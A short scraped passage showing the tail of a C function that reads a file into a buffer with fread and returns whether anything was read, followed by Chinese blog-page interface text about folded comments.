76 fread(*Buffer, *BufferSize, 1, f);
77 fclose(f);
78 }
79
80 return (*BufferSize != 0) ? TRUE : FALSE;
81}
扫一扫
4432
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
